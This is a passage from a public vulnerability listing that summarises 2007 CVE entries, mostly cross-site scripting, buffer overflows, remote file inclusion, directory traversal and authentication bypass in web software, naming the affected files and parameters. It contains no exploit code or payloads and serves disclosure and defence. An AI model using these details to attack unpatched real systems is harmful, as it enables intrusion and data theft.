script or HTML via the blog parameter in a content search action. [CVE-2007-2931] Heap-based buffer overflow in Microsoft MSN Messenger 6.2, 7.0, and 7.5, and Live Messenger 8.0 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving video conversation handling in Web Cam and video chat sessions. [CVE-2007-2929] The IBM Lenovo Access Support acpRunner ActiveX control, as distributed in acpcontroller.dll before 1.2.8.0 and possibly acpir.dll before 1.0.0.9 (Automated Solutions 1.0 before fix pack 1), exposes unsafe methods to arbitrary web domains, which allows remote attackers to download arbitrary code onto a client system and execute this code. [CVE-2007-2918] Multiple stack-based buffer overflows in ActiveX controls (1) VibeC in (a) vibecontrol.dll, (2) CallManager and (3) ViewerClient in (b) StarClient.dll, (4) ComLink in (c) uicomlink.dll, and (5) WebCamXMP in (d) wcamxmp.dll in Logitech VideoCall allow remote attackers to cause a denial of service (browser crash) and execute arbitrary code via unspecified vectors. [CVE-2007-2916] Cross-site scripting (XSS) vulnerability in showown.php in GMTT Music Distro 1.2 allows remote attackers to inject arbitrary web script or HTML via the st parameter. [CVE-2007-2915] Cross-site scripting (XSS) vulnerability in RM EasyMail Plus allows remote attackers to inject arbitrary web script or HTML via the title field in an email. [CVE-2007-2914] Multiple cross-site scripting (XSS) vulnerabilities in PsychoStats 3.0.6b allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) awards.php, (2) login.php, (3) register.php, (4) weapons.php, and possibly other unspecified files. [CVE-2007-2913] Cross-site scripting (XSS) vulnerability in index.php in ClonusWiki .5 allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2007-2910] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin before 3.6.7 PL1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to the vb_367_xss_fix_plugin.xml update, a related issue to CVE-2007-2909. [CVE-2007-2909] Cross-site scripting (XSS) vulnerability in calendar.php in Jelsoft vBulletin 3.6.x before 3.6.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to the vb_calendar366_xss_fix_plugin.xml update. [CVE-2007-2908] Cross-site scripting (XSS) vulnerability in calendar.php in Jelsoft vBulletin before 3.6.6 allows remote attackers to inject arbitrary web script or HTML via the title field in a single add action. [CVE-2007-2904] Cross-site scripting (XSS) vulnerability in Sun Java System Messaging Server 6.0 through 6.3, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly a related issue to CVE-2006-5653. [CVE-2007-2901] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the img parameter to main/inc/lib/fckeditor/editor/plugins/ImageManager/editor.php and other unspecified vectors. [CVE-2007-2892] Cross-site scripting (XSS) vulnerability in news.asp in ASP-Nuke 2.0.7 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: the provenance of this information is unknown [CVE-2007-2887] Cross-site scripting (XSS) vulnerability in index.php in Web Icerik Yonetim Sistemi (WIYS) 1.0 allows remote attackers to inject arbitrary web script or HTML via the No parameter in the Sayfa page. [CVE-2007-2881] Multiple stack-based buffer overflows in the SOCKS proxy support (sockd) in Sun Java Web Proxy Server before 4.0.5 allow remote attackers to execute arbitrary code via crafted packets during protocol negotiation. [CVE-2007-2880] Multiple cross-site scripting (XSS) vulnerabilities in Digirez 3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) Room_name parameter to room/info_book.asp or the (2) curYear parameter to room/week.asp. [CVE-2007-2879] Cross-site scripting (XSS) vulnerability in mods.php in GTP GNUTurk Portal System 3G allows remote attackers to inject arbitrary web script or HTML via the month parameter. [CVE-2007-2865] Cross-site scripting (XSS) vulnerability in sqledit.php in phpPgAdmin 4.1.1 allows remote attackers to inject arbitrary web script or HTML via the server parameter. [CVE-2007-2847] Multiple cross-site scripting (XSS) vulnerabilities in hlstats.php in HLstats 1.35, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) authusername or (2) authpassword parameter, different vectors than CVE-2007-0840 and CVE-2007-2812. [CVE-2007-2843] Cross-domain vulnerability in Apple Safari 2.0.4 allows remote attackers to access restricted information from other domains via Javascript, as demonstrated by a js script that accesses the location information of cross-domain web pages, probably involving setTimeout and timed events. [CVE-2007-2832] Cross-site scripting (XSS) vulnerability in the web application firewall in Cisco CallManager before 3.3(5)sr3, 4.1 before 4.1(3)sr5, 4.2 before 4.2(3)sr2, and 4.3 before 4.3(1)sr1 allows remote attackers to inject arbitrary web script or HTML via the pattern parameter to CCMAdmin/serverlist.asp (aka the search-form) and possibly other unspecified vectors. [CVE-2007-2826] PHP remote file inclusion vulnerability in lib/addressbook.php in Madirish Webmail 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[basedir] parameter. [CVE-2007-2825] Multiple cross-site scripting (XSS) vulnerabilities in ReadMsg.php in @Mail 5.02 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) links and (2) images. [CVE-2007-2819] Cross-site scripting (XSS) vulnerability in reportItem.do in Track+ 3.3.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the projId parameter. [CVE-2007-2818] Cross-site scripting (XSS) vulnerability in cand_login.asp in CactuSoft Parodia 6.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the strJobIDs parameter. [CVE-2007-2815] The "hit-highlighting" functionality in webhits.dll in Microsoft Internet Information Services (IIS) Web Server 5.0 only uses Windows NT ACL configuration, which allows remote attackers to bypass NTLM and basic authentication mechanisms and access private web directories via the CiWebhitsfile parameter to null.htw. [CVE-2007-2812] Cross-site scripting (XSS) vulnerability in hlstats.php in HLstats 1.35, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO or (2) the action parameter. [CVE-2007-2811] Cross-site scripting (XSS) vulnerability in OSK Advance-Flow 4.41 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-2808] Cross-site scripting (XSS) vulnerability in gnatsweb.pl in Gnatsweb 4.00 and Gnats 4.1.99 allows remote attackers to inject arbitrary web script or HTML via the database parameter. [CVE-2007-2806] Multiple cross-site scripting (XSS) vulnerabilities in index.php in GaliX 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) galix_cat_detail, (2) galix_gal_detail, and (3) galix_cat_detail_sort parameters. [CVE-2007-2805] Multiple cross-site scripting (XSS) vulnerabilities in index.php in ClientExec (CE) 3.0 beta2, and possibly other versions, allow remote attackers to inject arbitrary web script or HTML via the (1) ticketID, (2) view, and (3) fuse parameters. [CVE-2007-2804] Multiple cross-site scripting (XSS) vulnerabilities in scripts/prodList.asp in CandyPress Store 3.5.2.14 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) brand and (2) Msg parameters. [CVE-2007-2802] Cross-site scripting (XSS) vulnerability in cp/ps/Main/login/Login in RM EasyMail Plus allows remote attackers to inject arbitrary web script or HTML via the d parameter. [CVE-2007-2801] Multiple cross-site scripting (XSS) vulnerabilities in open.php in eTicket 1.5.5 and 1.5.5.1, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) err and (2) warn parameters. NOTE: the vendor disputes the significance of the issue, stating that "eTicket is not designed to work with register_globals On." [CVE-2007-2790] Cross-site scripting (XSS) vulnerability in shopcontent.asp in VP-ASP Shopping Cart 6.50, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the type parameter. [CVE-2007-2781] Cross-site scripting (XSS) vulnerability in include/sessionRegister.php in WikyBlog before 1.4.13 allows remote attackers to inject arbitrary web script or HTML, probably via vectors related to a certain data2 array element. [CVE-2007-2776] AlstraSoft Template Seller Pro 3.25 and earlier sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to inject a credential variable setting and obtain administrative access via a direct request to admin/changeinfo.php. [CVE-2007-2775] AlstraSoft Live Support 1.21 sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to obtain administrative access via a direct request to admin/managesettings.php. [CVE-2007-2757] Multiple cross-site scripting (XSS) vulnerabilities in Redoable 1.2 allow remote attackers to inject arbitrary web script or HTML via the s parameter to (1) wp-content/themes/redoable/searchloop.php or (2) wp-content/themes/redoable/header.php. [CVE-2007-2753] RunawaySoft Haber portal 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for data/xice.mdb. [CVE-2007-2747] Directory traversal vulnerability in rdw_helpers.py in rdiffWeb before 0.3.5.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to the /browse URI. [CVE-2007-2746] The viewList function in lib/WebGUI/Asset/Wobject/DataForm.pm in Plain Black WebGUI before 7.3.14 does not properly use data structures containing privilege information, which allows remote authenticated users to obtain sensitive information or possibly have other unspecified impact. [CVE-2007-2745] Cross-site scripting (XSS) vulnerability in printcal.pl in vDesk Webmail 4.03 allows remote attackers to inject arbitrary web script or HTML via the type parameter. [CVE-2007-2739] Cross-site scripting (XSS) vulnerability in xajax before 0.2.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-2733] Unrestricted file upload vulnerability in Jetbox CMS allows remote authenticated users with author privileges to upload arbitrary scripts via unspecified vectors, which can be accessed in webfiles/. NOTE: this issue might be a duplicate of CVE-2004-1448. [CVE-2007-2732] Multiple cross-site scripting (XSS) vulnerabilities in Jetbox CMS allow remote attackers to inject arbitrary web script or HTML via the (1) path parameter to view/search/ [CVE-2007-2724] Cross-site scripting (XSS) vulnerability in all_photos.html in fotolog allows remote attackers to inject arbitrary web script or HTML via the user parameter. [CVE-2007-2723] Media Player Classic 6.4.9.0 allows user-assisted remote attackers to cause a denial of service (web browser crash) via an "empty" .MPA file, which triggers a divide-by-zero error. [CVE-2007-2719] Session fixation vulnerability in HP Systems Insight Manager (SIM) 4.2 and 5.0 SP4 and SP5 allows remote attackers to hijack web sessions by setting the JSESSIONID cookie. [CVE-2007-2718] Cross-site scripting (XSS) vulnerability in the WebMail system in Stalker CommuniGate Pro 5.1.8 and earlier, when using Microsoft Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via crafted STYLE tags. [CVE-2007-2716] Multiple cross-site scripting (XSS) vulnerabilities in EQdkp 1.3.2c and earlier allow remote attackers to inject arbitrary web script or HTML via the show parameter to (1) listmembers.php and (2) stats.php. NOTE: some of these details are obtained from third party information. [CVE-2007-2713] ifdate 2.x sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to obtain administrative access via a direct request for the admin/ URI. [CVE-2007-2705] Directory traversal vulnerability in the Test View Console in BEA WebLogic Integration 9.2 before SP1 and WebLogic Workshop 8.1 SP2 through SP6, when "deployed in an exploded format," allows remote attackers to list a WebLogic Workshop Directory (wlwdir) parent directory via unspecified vectors. [CVE-2007-2704] BEA WebLogic Server 9.0 through 9.2 allows remote attackers to cause a denial of service (SSL port unavailability) by accessing a half-closed SSL socket. [CVE-2007-2703] BEA WebLogic Portal 9.2 GA can corrupt a visitor entitlements role if an administrator provides a long role description, which might allow remote authenticated users to access privileged resources. [CVE-2007-2702] Cross-site scripting (XSS) vulnerability in the GroupSpace application in BEA WebLogic Portal 9.2 GA allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors related to the rich text editor. [CVE-2007-2701] The JMS Message Bridge in BEA WebLogic Server 7.0 through SP7 and 8.1 through Service Pack 6, when configured without a username and password, or when the connection URL is not defined, allows remote attackers to bypass the security access policy and "send unauthorized messages to a protected queue." [CVE-2007-2700] The WLST script generated by the configToScript command in BEA WebLogic Express and WebLogic Server 9.0 and 9.1 does not encrypt certain attributes in configuration files when creating a new domain, which allows remote authenticated users to obtain sensitive information. [CVE-2007-2699] The Administration Console in BEA WebLogic Express and WebLogic Server 9.0 and 9.1 does not properly enforce certain Domain Security Policies, which allows remote administrative users in the Deployer role to upload arbitrary files. [CVE-2007-2698] The Administration Console in BEA WebLogic Server 9.0 may show plaintext Web Service attributes during configuration creation, which allows remote attackers to obtain sensitive credential information. [CVE-2007-2697] The embedded LDAP server in BEA WebLogic Express and WebLogic Server 7.0 through SP6, 8.1 through SP5, 9.0, and 9.1, when in certain configurations, does not limit or audit failed authentication attempts, which allows remote attackers to more easily conduct brute-force attacks against the administrator password, or flood the server with login attempts and cause a denial of service. [CVE-2007-2696] The JMS Server in BEA WebLogic Server 6.1 through SP7, 7.0 through SP6, and 8.1 through SP5 enforces security access policies on the front end, which allows remote attackers to access protected queues via direct requests to the JMS back-end server. [CVE-2007-2695] The HttpClusterServlet and HttpProxyServlet in BEA WebLogic Express and WebLogic Server 6.1 through SP7, 7.0 through SP7, 8.1 through SP5, 9.0, and 9.1, when SecureProxy is enabled, may process "external requests on behalf of a system identity," which allows remote attackers to access administrative data or functionality. [CVE-2007-2694] Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Express and WebLogic Server 6.1 through SP7, 7.0 through SP7, 8.1 through SP5, 9.0 GA, and 9.1 GA allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-2689] Check Point Web Intelligence does not properly handle certain full-width and half-width Unicode character encodings, which might allow remote attackers to evade detection of HTTP traffic. [CVE-2007-2686] Cross-site scripting (XSS) vulnerability in index.php in Jetbox CMS 2.1 allows remote attackers to inject arbitrary web script or HTML via the login parameter in a sendpwd task. [CVE-2007-2669] Multiple cross-site scripting (XSS) vulnerabilities in PHPChain 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the catid parameter to (1) settings.php or (2) cat.php. NOTE: certain parameter values also trigger path disclosure. [CVE-2007-2668] Buffer overflow in webdesproxy 0.0.1 allows remote attackers to execute arbitrary code via a long URL, possibly involving the process_connection_request function in webdesproxy.c. [CVE-2007-2655] Unspecified vulnerability in NetWin Webmail 3.1s-1 in SurgeMail before 3.8i2 has unknown impact and remote attack vectors, possibly a format string vulnerability that allows remote code execution. [CVE-2007-2638] eFileCabinet 3.3 allows remote attackers to bypass authentication and access restricted portions of the interface via an invalid filecabinetnumber, which can be leveraged to obtain sensitive information or create new data structures. [CVE-2007-2632] Multiple cross-site scripting (XSS) vulnerabilities in PHP Multi User Randomizer (phpMUR) 2006.09.13 allow remote attackers to inject arbitrary web script or HTML via (1) the edit_plugin parameter to configure_plugin.tpl.php, or (2) certain array parameters to web/phpinfo.php, as demonstrated by 1[] or a[]. [CVE-2007-2627] Cross-site scripting (XSS) vulnerability in sidebar.php in WordPress, when custom 404 pages that call get_sidebar are used, allows remote attackers to inject arbitrary web script or HTML via the query string (PHP_SELF), a different vulnerability than CVE-2007-1622. [CVE-2007-2625] Cross-site scripting (XSS) vulnerability in shared/code/cp_authorization.php in All In One Control Panel (AIOCP) before 1.3.016 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. NOTE: some of these details are obtained from third party information. [CVE-2007-2610] Cross-site scripting (XSS) vulnerability in OpenLD before 1.1.9, and 1.1-modified before 1.1-modified3, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the Search feature, possibly the term parameter. [CVE-2007-2600] Multiple cross-site scripting (XSS) vulnerabilities in TutorialCMS (aka Photoshop Tutorials) 1.00 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) catFile parameter to (a) browseCat.php or (b) browseSubCat.php [CVE-2007-2592] Multiple cross-site scripting (XSS) vulnerabilities in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to de/pda/dev_logon.asp and (2) multiple unspecified vectors in (a) usrmgr/registerAccount.asp, (b) de/create_account.asp, and other files. [CVE-2007-2588] Multiple buffer overflows in the Office Viewer OCX ActiveX control (oa.ocx) 3.2 allow remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long argument to the (1) HttpDownloadFile, (2) Open, (3) OpenWebFile, (4) DoOleCommand, (5) FTPDownloadFile, (6) FTPUploadFile, (7) HttpUploadFile, (8) Save, or (9) SaveWebFile function. [CVE-2007-2581] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft Windows SharePoint Services 3.0 for Windows Server 2003 and Office SharePoint Server 2007 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) in "every main page," as demonstrated by default.aspx. [CVE-2007-2579] Multiple cross-site scripting (XSS) vulnerabilities in ACP3 4.0 beta 3 allow remote attackers to inject arbitrary web script or HTML via (1) the form[mail] parameter to contact/contact/index.php [CVE-2007-2574] Directory traversal vulnerability in index.php in Archangel Weblog 0.90.02 allows remote attackers to read arbitrary files via a .. (dot dot) in the index parameter. [CVE-2007-2562] Cross-site scripting (XSS) vulnerability in index.php in Kayako eSupport 3.00.90 allows remote attackers to inject arbitrary web script or HTML via the _m parameter. [CVE-2007-2551] Cross-site scripting (XSS) vulnerability in usersettings.php in WikkaWiki (Wikka Wiki) before 1.1.6.3 allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2007-2549] SQL injection vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 allows remote attackers to execute arbitrary SQL commands via the (1) c or (2) quantity parameter. [CVE-2007-2548] Unspecified vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 has unknown impact and an l remote attack vector, related to "Cookie Manipulation." [CVE-2007-2547] Cross-site scripting (XSS) vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 allows remote attackers to inject arbitrary web script or HTML via the l parameter. [CVE-2007-2546] Session fixation vulnerability in Simple Machines Forum (SMF) 1.1.2 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2007-2532] Multiple cross-site scripting (XSS) vulnerabilities in Minh Nguyen Duong Obie Website Mini Web Shop 2 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) to (1) sendmail.php or (2) order_form.php, different vectors than CVE-2006-6734. [CVE-2007-2524] Cross-site scripting (XSS) vulnerability in index.pl in Open Ticket Request System (OTRS) 2.0.x allows remote attackers to inject arbitrary web script or HTML via the Subaction parameter in an AgentTicketMailbox Action. NOTE: DEBIAN:DSA-1299 originally used this identifier for an ipsec-tools issue, but the proper identifier for the ipsec-tools issue is CVE-2007-1841. [CVE-2007-2522] Stack-based buffer overflow in the inoweb Console Server in CA Anti-Virus for the Enterprise r8, Threat Manager r8, Anti-Spyware for the Enterprise r8, and Protection Suites r3 allows remote attackers to execute arbitrary code via a long (1) username or (2) password. [CVE-2007-2506] WebSpeed 3.x in OpenEdge 10.x in Progress Software Progress 9.1e, and certain other 9.x versions, allows remote attackers to cause a denial of service (infinite loop and daemon hang) via a messenger URL that invokes _edit.r with no additional parameters, as demonstrated by requests for cgiip.exe or wsisa.dll with WService=wsbroker1/_edit.r in the PATH_INFO. [CVE-2007-2499] Multiple cross-site scripting (XSS) vulnerabilities in DVDdb 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the movieid parameter to loan.php or (2) the s parameter to listmovies.php. [CVE-2007-2496] The WordOCX ActiveX control in WordViewer.ocx 3.2.0.5 allows remote attackers to cause a denial of service (Internet Explorer 7 crash) via a long (1) DoOleCommand, (2) FTPDownloadFile, (3) FTPUploadFile, (4) HttpUploadFile, (5) GotoPage, (6) Save, (7) SaveWebFile, (8) HttpDownloadFile, (9) Open, (10) OpenWebFile, (11) SaveAs, or (12) ShowWordStandardDialog property value. [CVE-2007-2495] Multiple stack-based buffer overflows in the ExcelOCX ActiveX control in ExcelViewer.ocx 3.1.0.6 allow remote attackers to cause a denial of service (Internet Explorer 7 crash) via a long (1) DoOleCommand, (2) FTPDownloadFile, (3) FTPUploadFile, (4) HttpUploadFile, (5) Save, (6) SaveWebFile, (7) HttpDownloadFile, (8) Open, or (9) OpenWebFile property value. NOTE: some of these details are obtained from third party information. [CVE-2007-2494] Multiple stack-based buffer overflows in the PowerPointOCX ActiveX control in PowerPointViewer.ocx 3.1.0.3 allow remote attackers to cause a denial of service (Internet Explorer 7 crash) via a long (1) DoOleCommand, (2) FTPDownloadFile, (3) FTPUploadFile, (4) HttpUploadFile, (5) Save, (6) SaveWebFile, (7) HttpDownloadFile, (8) Open, or (9) OpenWebFile property value. NOTE: some of these details are obtained from third party information. [CVE-2007-2474] Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools SunShop Shopping Cart 4.0 allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) include/payment/payflow_pro.php, (2) global.php, or (3) libsecure.php, different vectors than CVE-2007-2070. [CVE-2007-2472] Cross-site scripting (XSS) vulnerability in sendcard.php in Sendcard 3.4.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the form parameter. NOTE: the provenance of this information is unknown [CVE-2007-2470] Multiple cross-site scripting (XSS) vulnerabilities in index.php in FileRun 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) page, (2) module, or (3) section parameter. [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors. [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the ' [CVE-2007-2441] Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to obtain the system path via certain URLs associated with (1) deploying web applications or (2) displaying .xtp files. [CVE-2007-2440] Directory traversal vulnerability in Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to read certain files via a .. (dot dot) in a URI containing a "\web-inf" sequence. [CVE-2007-2435] Sun Java Web Start in JDK and JRE 5.0 Update 10 and earlier, and Java Web Start in SDK and JRE 1.4.2_13 and earlier, allows remote attackers to perform unauthorized actions via an application that grants privileges to itself, related to "Incorrect Use of System Classes" and probably related to support for JNLP files. [CVE-2007-2433] Cross-site scripting (XSS) vulnerability in index.php in Ariadne 2.4.1 allows remote attackers to inject arbitrary web script or HTML via the ARLogin parameter. NOTE: the provenance of this information is unknown [CVE-2007-2432] Cross-site scripting (XSS) vulnerability in utilities/search.asp in nukedit 4.9.7b allows remote attackers to inject arbitrary web script or HTML via the terms parameter. NOTE: the provenance of this information is unknown [CVE-2007-2431] Dynamic variable evaluation vulnerability in shared/config/tce_config.php in TCExam 4.0.011 and earlier allows remote attackers to conduct cross-site scripting (XSS) and possibly other attacks by modifying critical variables such as $_SERVER, as demonstrated by injecting web script via the _SERVER[SCRIPT_NAME] parameter. [CVE-2007-2423] Cross-site scripting (XSS) vulnerability in index.php in MoinMoin 1.5.7 allows remote attackers to inject arbitrary web script or HTML via the do parameter in an AttachFile action, a different vulnerability than CVE-2007-0857. NOTE: the provenance of this information is unknown [CVE-2007-2421] Buffer overflow in Hitachi Groupmax Mobile Option for Mobile-Phone 07-00 through 07-30, 5 for i-mode 05-11 through 05-23, and 6 for EZweb 06-00 through 06-04 allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2007-2419] Multiple buffer overflows in an ActiveX control (boisweb.dll) in Macrovision FLEXnet Connect 6.0 and Update Service 3.x to 5.x allow remote attackers to execute arbitrary code via the (1) the second parameter to the DownloadAndExecute method and (2) third parameter to the AddFileEx method, a different vulnerability than CVE-2007-0328. [CVE-2007-2415] Pi3Web Web Server 2.0.3 PL1 allows remote attackers to cause a denial of service (application exit) via a long URI. NOTE: this issue was originally reported as a crash, but the vendor states that the impact is a "clean" exit in which "the server I/O loop finishes and the process exits normally." [CVE-2007-2410] WebCore on Apple Mac OS X 10.3.9 and 10.4.10 retains properties of certain global objects when a new URL is visited in the same window, which allows remote attackers to conduct cross-site scripting (XSS) attacks. [CVE-2007-2409] Cross-domain vulnerability in WebCore on Apple Mac OS X 10.3.9 and 10.4.10 allows remote attackers to obtain sensitive information via a popup window, which is able to read the current URL of the parent window. [CVE-2007-2408] WebKit in Apple Safari 3 Beta before Update 3.0.3 does not properly recognize an unchecked "Enable Java" setting, which allows remote attackers to execute Java applets via a crafted web page. [CVE-2007-2401] CRLF injection vulnerability in WebCore in Apple Mac OS X 10.3.9, 10.4.9 and later, and iPhone before 1.0.1, allows remote attackers to inject arbitrary HTTP headers via LF characters in an XMLHttpRequest request, which are not filtered when serializing headers via the setRequestHeader function. NOTE: this issue can be leveraged for cross-site scripting (XSS) attacks. [CVE-2007-2399] WebKit in Apple Mac OS X 10.3.9, 10.4.9 and later, and iPhone before 1.0.1 performs an "invalid type conversion", which allows remote attackers to execute arbitrary code via unspecified frame sets that trigger memory corruption. [CVE-2007-2396] The JDirect support in QuickTime for Java in Apple Quicktime before 7.2 exposes certain dangerous interfaces, which allows remote attackers to execute arbitrary code via crafted Java applets. [CVE-2007-2391] Cross-site scripting (XSS) vulnerability in Apple Safari Beta 3.0.1 for Windows allows remote attackers to inject arbitrary web script or HTML via a web page that includes a windows.setTimeout function that is activated after the user has moved from the current page. [CVE-2007-2389] Apple QuickTime for Java 7.1.6 on Mac OS X and Windows does not clear potentially sensitive memory before use, which allows remote attackers to read memory from a web browser via unknown vectors related to Java applets. [CVE-2007-2388] Apple QuickTime for Java 7.1.6 on Mac OS X and Windows does not properly restrict QTObject subclassing, which allows remote attackers to execute arbitrary code via a web page containing a user-defined class that accesses unsafe functions that can be leveraged to write to arbitrary memory locations. [CVE-2007-2385] The Yahoo! UI framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2384] The Script.aculo.us framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2383] The Prototype (prototypejs) framework before 1.5.1 RC3 exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2382] The Moo.fx framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2381] The MochiKit framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2380] The Microsoft Atlas framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2379] The jQuery framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2378] The Google Web Toolkit (GWT) framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2377] The Getahead Direct Web Remoting (DWR) framework 1.1.4 exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2376] The Dojo framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2375] The agent remote upgrade interface in Symantec Enterprise Security Manager (ESM) before 20070405 does not verify the authenticity of upgrades, which allows remote attackers to execute arbitrary code via software that implements the agent upgrade protocol. [CVE-2007-2369] Directory traversal vulnerability in picture.php in WebSPELL 4.01.02 and earlier, when PHP before 4.3.0 is used, allows remote attackers to read arbitrary files via a .. (dot dot) in the id parameter. [CVE-2007-2368] picture.php in WebSPELL 4.01.02 and earlier allows remote attackers to read arbitrary files via the file parameter. [CVE-2007-2357] Cross-site scripting (XSS) vulnerability in mods/Core/result.php in SineCms 2.3.4 allows remote attackers to inject arbitrary web script or HTML via the stringa parameter. [CVE-2007-2354] Progress Webspeed Messenger allows remote attackers to obtain sensitive information via a WService parameter containing "wsbroker1/webutil/about.r", which reveals the operating system and product information. [CVE-2007-2349] Cross-site scripting (XSS) vulnerability in Invision Power Board (IP.Board) 2.1.x and 2.2.x allows remote attackers to inject arbitrary web script or HTML by uploading crafted images or PDF files. [CVE-2007-2337] Multiple cross-site scripting (XSS) vulnerabilities in Exponent CMS 0.96.6 Alpha and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter to (a) magpie_debug.php and (b) magpie_simple.php in external/magpierss/scripts/, the (2) rss_url parameter to (c) magpie_slashbox.php in external/magpierss/scripts/, and the (3) body parameter to the (d) weblogmodule (aka Weblog Comments) module. [CVE-2007-2336] Unspecified vulnerability in InterVations NaviCOPA Web Server 2.01 20070323 allows remote attackers to cause a denial of service (daemon crash) via crafted HTTP requests, as demonstrated by long requests containing '\A' characters, probably a different issue than CVE-2006-5112 and CVE-2007-1733. NOTE: the provenance of this information is 